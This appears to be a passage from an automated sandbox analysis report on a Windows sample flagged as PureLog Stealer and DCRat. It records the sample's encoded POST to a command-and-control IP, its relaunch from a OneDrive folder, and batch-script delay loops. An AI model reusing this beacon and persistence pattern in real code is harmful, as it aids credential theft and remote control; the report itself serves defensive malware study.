                                                  Nov 19, 2024 18:56:08.019062996 CET450OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:56:08.365339041 CET344OUTData Raw: 00 03 01 05 06 0e 04 02 05 06 02 01 02 02 01 06 00 0b 05 0e 02 0d 03 09 02 55 0f 06 06 04 02 02 0d 55 05 59 03 01 06 00 0b 0b 07 06 06 0b 07 54 06 54 0b 01 0a 0f 06 02 07 06 06 54 04 0b 05 01 02 56 0c 0c 07 03 05 04 0f 01 0d 01 0d 0d 0e 09 06 01
                                                  Data Ascii: UUYTTTVXV\L~@|NTcaubvhRuLvllkcc^oRlYzpqYkmoRtw[iO~V@{mPbu
                                                  Nov 19, 2024 18:56:08.669126034 CET518INHTTP/1.1 100 Continue
                                                  Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 36 3a 30 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:56:08 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:12:52:07
                                                  Start date:19/11/2024
                                                  Path:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\KPFv8ATDx0.exe"
                                                  Imagebase:0x3a0000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1295138767.00000000003A2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1346120798.0000000012961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:12:52:11
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\iHmrx8Dkeu.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:12:52:11
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:12:52:11
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:12:52:11
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\w32tm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                  Imagebase:0x7ff755dd0000
                                                  File size:108'032 bytes
                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:12:52:18
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0x9e0000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:12:52:22
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JRGN3N9ZXF.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:12:52:22
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:11
                                                  Start time:12:52:22
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:12
                                                  Start time:12:52:22
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\PING.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x7ff7e17d0000
                                                  File size:22'528 bytes
                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:14
                                                  Start time:14:45:35
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0xd50000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:16
                                                  Start time:14:45:38
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aehWhM7TGU.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:17
                                                  Start time:14:45:38
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:18
                                                  Start time:14:45:39
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:19
                                                  Start time:14:45:39
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\w32tm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                  Imagebase:0x7ff755dd0000
                                                  File size:108'032 bytes
                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:20
                                                  Start time:14:45:46
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0x1c0000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:22
                                                  Start time:14:45:49
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cWXsH5vMZ0.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:23
                                                  Start time:14:45:49
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:24
                                                  Start time:14:45:49
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:25
                                                  Start time:14:45:50
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\PING.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x7ff7e17d0000
                                                  File size:22'528 bytes
                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:26
                                                  Start time:14:45:59
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0xda0000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:28
                                                  Start time:14:46:02
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\pFxSEGDzP3.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:29
                                                  Start time:14:46:03
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:30
                                                  Start time:14:46:03
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:31
                                                  Start time:14:46:03
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\w32tm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                  Imagebase:0x7ff755dd0000
                                                  File size:108'032 bytes
                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:34
                                                  Start time:14:46:11
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0x8a0000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:36
                                                  Start time:14:46:14
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yJr0BespZg.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:37
                                                  Start time:14:46:14
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:38
                                                  Start time:14:46:14
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:39
                                                  Start time:14:46:14
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\PING.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x7ff7e17d0000
                                                  File size:22'528 bytes
                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:40
                                                  Start time:14:46:23
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0x70000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:42
                                                  Start time:14:46:26
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bgR6NVhjy4.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:43
                                                  Start time:14:46:26
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:44
                                                  Start time:14:46:26
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:45
                                                  Start time:14:46:26
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\w32tm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                  Imagebase:0x7ff755dd0000
                                                  File size:108'032 bytes
                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:46
                                                  Start time:14:46:33
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0x2e0000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:48
                                                  Start time:14:46:36
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bqMLTwU6O8.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:49
                                                  Start time:14:46:36
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:50
                                                  Start time:14:46:36
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:51
                                                  Start time:14:46:36
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\PING.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x7ff7e17d0000
                                                  File size:22'528 bytes
                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:52
                                                  Start time:14:46:46
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0x3d0000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:54
                                                  Start time:14:46:49
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4XCyKdTKaY.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:55
                                                  Start time:14:46:49
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:56
                                                  Start time:14:46:49
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:57
                                                  Start time:14:46:49
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\PING.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x7ff7e17d0000
                                                  File size:22'528 bytes
                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:58
                                                  Start time:14:46:58
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0xc30000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:2.8%
                                                    Dynamic/Decrypted Code Coverage:80%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:15
                                                    Total number of Limit Nodes:0
                                                    execution_graph 16881 7ffaac7001a9 16882 7ffaac7001b7 CloseHandle 16881->16882 16884 7ffaac700294 16882->16884 16885 7ffaacca2c35 16887 7ffaacca2c4f QueryFullProcessImageNameA 16885->16887 16888 7ffaacca2eda 16887->16888 16877 7ffaac701e35 16878 7ffaac701e4f GetFileAttributesW 16877->16878 16880 7ffaac701f15 16878->16880 16893 7ffaac700040 16894 7ffaac70007b ResumeThread 16893->16894 16896 7ffaac700154 16894->16896 16889 7ffaac6fe84d 16890 7ffaac6fe85b SuspendThread 16889->16890 16892 7ffaac6fe934 16890->16892

                                                    Executed Functions

                                                    Function 00007FFAAC550D68 Relevance: .3, Instructions: 275COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 133 7ffaac550d68-7ffaac550d7f 134 7ffaac550d81 133->134 135 7ffaac550d82-7ffaac550db9 133->135 134->135 137 7ffaac550dc0-7ffaac550e44 call 7ffaac5507d8 135->137 138 7ffaac550dbb 135->138 149 7ffaac550e47-7ffaac550e53 137->149 138->137 151 7ffaac550e56 149->151 151->149 152 7ffaac550e58-7ffaac550ebe 151->152 152->151 157 7ffaac550ec0-7ffaac550fa3 152->157 167 7ffaac550fab-7ffaac55109c 157->167
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
